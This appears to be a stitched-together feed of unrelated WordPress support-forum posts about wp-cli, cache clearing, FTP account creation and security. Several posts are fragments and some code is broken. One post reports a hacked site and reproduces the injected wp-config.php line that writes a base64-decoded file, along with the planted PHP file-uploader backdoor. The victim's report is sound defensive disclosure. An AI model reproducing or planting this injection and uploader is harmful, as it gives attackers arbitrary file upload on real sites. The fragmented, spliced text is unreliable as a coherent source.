I would like to import products to my WordPress website through the command line in Linux. Then, I’ve Googled and I found that wp-cli can be used to realize this operation.
Then, I’ve tried to install it by following the instructions mentioned in the following link https://make.www.ads-software.com/cli/handbook/guides/installing/.
Then, I’ve tried to connect to my website through an SSH connection, and it wasn’t successful. Consequently, I have decided to try to go to the directory where the website is installed and trying to get the list of plugins, it didn’t work either.
After that, I went back to the installation guide and there was a paragraph about the installation of the WordPress website. NH
As a result, I’ve concluded that wp-cli works only with WordPress websites that have been installed through wp-cli. Please let me know if I am wrong.
So my final question is:
Is it possible to run Wp-cli for WordPress websites that have not been installed through wp-client?
Thanks in advance for your help guys
]]>ps -u “user” -o user,pid,start,etime,time,nice,vsz,rss,command | egrep ‘PID|php-fpm’ | sed ‘/grep/d’
to get a list of php-fpm processes (Of course, replace “user” with your user id).
]]>If not, can you recommend a way to do so in shell? We clear all cache on deployment. For example, with the LiteSpeed-Cache plugin, we run a command “wp lscache-purge all”.
]]>I want to report, that someone has uploaded php uploader script through wp-config.php
the wp-config.php become like this
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress'); file_put_contents("wp-upload-class.php", base64_decode('code removed by moderator')); /*');
/** MySQL database username */
define('DB_USER', 'user');
/** MySQL database password */
define('DB_PASSWORD', 'password');
/** MySQL hostname */
define('DB_HOST', 'localhost:');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
also they successfully create wp-upload-class.php
with uploader script which encoded as Base64
echo "This shit works!";
if (isset($_FILES["filename"]))
if($_FILES["filename"]["size"] > 1024*3*1024)
echo ("File too large (more than 3Mb)");
move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
echo ("<br>Done!<br>");
} else {
echo("<br>Error! ".$php_errormsg."<br>");
Please Fix It, i don’t know if anybody have been attacked with same method or not.
]]>I work in Bitbucket for all my code needs and am wondering if this is possible. I would like to flush the cache after a pull request is merged in to “master” or a commit is sent to “master”. I came up with a simple little hack that should work, but I would like to check here first before trying it.
1. Create a page named Clear Cache.
2. Change the permalink to something long and annoying like this.
3. Use this custom page template and assign it to the page created in step 1.
4. In Bitbucket Pipelines after deploy to FTP, add another line of code to call a shell script. Inside the shell script, tell it to open the page created.
Because the page template is attached, the cache should be cleared. Then I can use .htaccess to restrict the file to hosts/IPs for Bitbucket.
Would this work? Seems good on paper, but not sure what would happen when trying it. Alternatively, I could use a shell script to SSH to server and execute a WP_CLI command to clear the cache.
]]>1. when user actives his email, a shell file will run and create a ftp account in the server and then mail the account info (username and password) to him.
2. when a logged-in user click one link(“get account”) in the top page he will get a account as well.
I like Wordfence Security because it’s the best one I’v tested, but I think it will more helpful if you make it able to detect all known shells.
The webadmin.php source code can be found on its website here:
It’s just a web file manager but it’s used bu hackers.